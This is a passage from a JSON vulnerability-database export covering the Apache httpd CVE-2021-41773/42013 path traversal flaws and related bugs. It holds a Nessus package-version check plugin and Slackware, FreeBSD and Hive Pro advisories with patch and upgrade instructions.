"p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ldap", "p-cpe:/a:amazon:linux:mod_md", "p-cpe:/a:amazon:linux:mod_proxy_html", "p-cpe:/a:amazon:linux:mod_session", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1716.NASL", "href": "https://www.tenable.com/plugins/nessus/154179", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1716.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154179);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"ALAS\", value:\"2021-1716\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux 2 : httpd (ALAS-2021-1716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). 
(CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. 
This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update httpd' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n 
script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'httpd-filesystem-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'x86_64', 
'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / etc\");\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:58:52", "description": "The instance of Apache HTTP Server running on the remote host is affected by a path traversal vulnerability. 
A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T00:00:00", "type": "nessus", "title": "Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/155600", "sourceData": "Binary data apache_2_4_50_path_traversal.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2021-11-26T18:49:38", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.50-i586-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements.\n Fixed null pointer dereference in h2 fuzzing.\n Fixed path 
traversal and file disclosure vulnerability.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.50-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.50-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.50-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.50-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.50-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.50-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.50-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.50-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.50-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T01:14:05", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T01:14:05", "id": "SSA-2021-278-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.434604", "cvss": 
{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-26T18:49:38", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.51-i586-1_slack14.2.txz: Upgraded.\n SECURITY: CVE-2021-42013: Path Traversal and Remote Code\n Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete\n fix of CVE-2021-41773) (cve.mitre.org)\n It was found that the fix for CVE-2021-41773 in Apache HTTP\n Server 2.4.50 was insufficient. An attacker could use a path\n traversal attack to map URLs to files outside the directories\n configured by Alias-like directives.\n If files outside of these directories are not protected by the\n usual default configuration \"require all denied\", these requests\n can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution.\n This issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n earlier versions.\n Credits: Reported by Juan Escobar from Dreamlab Technologies,\n Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.51-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.51-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.51-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.51-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.51-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.51-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.51-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.51-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.51-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T03:27:06", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T03:27:06", "id": "SSA-2021-280-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.483439", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-10-13T11:19:35", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file 
here.](<https://www.hivepro.com/wp-content/uploads/2021/10/Multiple-vulnerabilities-have-been-discovered-in-the-Apache-HTTP-Server_TA202140.pdf>)\n\nThere is a zero-day vulnerability (CVE-2021-41773) and a DoS vulnerability (CVE-2021-41524) in Apache HTTP servers. After a publicly disclosed exploit, the zero-day vulnerability has been actively exploited in the wild. The Hive Pro Threat research team recommends that you address these vulnerabilities as soon as possible.\n\n#### Vulnerability Details\n\n\n\n#### Patch Link\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n#### References\n\n<https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/>", "cvss3": {}, "published": "2021-10-06T08:57:02", "type": "hivepro", "title": "Multiple vulnerabilities have been discovered in the Apache HTTP Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T08:57:02", "id": "HIVEPRO:7FC9DCD27C78F4BFA53C84B6CB04EC19", "href": "https://www.hivepro.com/multiple-vulnerabilities-have-been-discovered-in-apache-http-server/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\n\nmoderate: null pointer dereference in h2 fuzzing\n\t (CVE-2021-41524)\nimportant: Path traversal and file disclosure vulnerability in\n\t Apache HTTP Server 2.4.49 (CVE-2021-41773)\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "freebsd", "title": "Apache httpd -- Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "25B78BDD-25B8-11EC-A341-D4C9EF517024", "href": "https://vuxml.freebsd.org/freebsd/25b78bdd-25b8-11ec-a341-d4c9ef517024.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\n\t Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\t (CVE-2021-42013).\nIt was found that the fix for CVE-2021-41773 in Apache HTTP\n\t Server 2.4.50 was insufficient. An attacker could use a path\n\t traversal attack to map URLs to files outside the directories\n\t configured by Alias-like directives.\nIf files outside of these directories are not protected by the\n\t usual default configuration \"require all denied\", these requests\n\t can succeed. 
If CGI scripts are also enabled for these aliased\n\t pathes, this could allow for remote code execution.\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n\t earlier versions.\nAcknowledgements: Reported by Juan Escobar from Dreamlab\n\t Technologies, Fernando Munoz from NULL Life CTF Team, and\n\t Shungo Kumasaka\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "freebsd", "title": "Apache httpd -- Path Traversal and Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "D001C189-2793-11EC-8FB1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "The updated packages fix a security vulnerabilities: While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. 
